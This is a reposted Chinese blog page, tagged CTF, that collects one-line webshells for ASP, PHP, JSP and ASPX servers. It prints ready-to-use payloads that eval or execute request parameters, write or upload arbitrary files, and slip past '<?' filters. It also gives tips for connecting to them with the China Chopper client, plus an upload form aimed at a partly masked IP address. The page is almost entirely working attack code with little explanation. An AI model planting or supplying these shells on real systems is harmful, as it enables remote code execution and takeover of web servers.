碼上歡樂
相關內容    簡體    繁體

各種小馬收集

本文轉載自   查看原文   2020-01-09 13:43   793    CTF

ASP
<%eval request("sb")%>

<%execute request("sb")%>

<%execute(request("sb"))%>

<%execute request("sb")%><%'<% loop <%:%>

<%'<% loop <%:%><%execute request("sb")%>

<%execute request("sb")'<% loop <%:%>[code]
[code]<script language=vbs runat=server>eval(request("sb"))</script>

<%execute request("sb")'<% loop <%:%>[code]
[code]<script language=vbs runat=server>eval(request("sb"))</script>

%><%Eval(Request(chr(35)))%><%

<%eval request("sb")%>

<%ExecuteGlobal request("sb")%>

if Request("sb")<>"" then ExecuteGlobal request("sb") end if

 

 

 

 


PHP
<?php eval($_POST[sb])?>

 

<?php @eval($_POST[sb])?> //容錯代碼

 

<?php assert($_POST[sb]);?> //使用lanker一句話客戶端的專家模式執行相關的php語句

 

<?$_POST['sa']($_POST['sb']);?>

 

<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>

 

<?php
@preg_replace("/[email]/e",$_POST['h'],"error");
?>

//使用這個后,使用菜刀一句話客戶端在配置連接的時候在"配置"一欄輸入

 

<O>h=@eval($_POST[c]);</O>

 

<script language="php">@eval($_POST[sb])</script>

//繞過<?限制的一句話

<?=@eval($_POST['cmd']);
//這個也是吊炸天...

<?=`*`;
//吊炸天!大致上等價於
//<?php echo `bash bash2 index.html p.php` ?>
//訪問p.php的時候,bash就會執行bash2這個文件里的命令,后面的文件無視掉
//通過修改bash2這個文件的內容就可以構造命令執行。


$filename=$_GET['xbid'];
include ($filename);
//危險的include函數,直接編譯任何文件為php格式運行

$reg="c"."o"."p"."y";
$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);
//重命名任何文件

 

 

 

 

JSP
<%
if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());
%>


<form action="http://59.x.x.x:8080/scdc/bob.jsp?f=fuckjp.jsp" method="post">
<textarea name=t cols=120 rows=10 width=45>your code</textarea><BR><center><br>
<input type=submit value="提交">
</form>

 

 

 

 

 

ASPX

 

<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>

<%@ Page Language="Jscript" validateRequest="false" %><%Response.Write(eval(Request.Item["w"],"unsafe"));%>
//Jscript的asp.net一句話


<%if (Request.Files.Count!=0) { Request.Files[0].SaveAs(Server.MapPath(Request["f"]) ); }%>
//C#的asp.net一句話


<% If Request.Files.Count <> 0 Then Request.Files(0).SaveAs(Server.MapPath(Request("f")) ) %>
//VB的asp.net一句話

 

 

 

 

原文鏈接:https://blog.csdn.net/qq_35078631/article/details/77743794


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 .NET框架之“小馬過河” 菜刀jsp小馬 淺談PHP小馬免殺 saltstack編譯安裝與小馬運維開發 HTTP協議包分析(小馬上傳大馬) 小馬激活工具激活系統導致系統崩潰 hadoop 異常及處理總結-01(小馬哥-原創) 極客時間-小馬哥講Spring核心編程思想 新時代的互聯網打印—小馬快印 小馬哥的 Java 項目實戰營學習筆記(1)
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM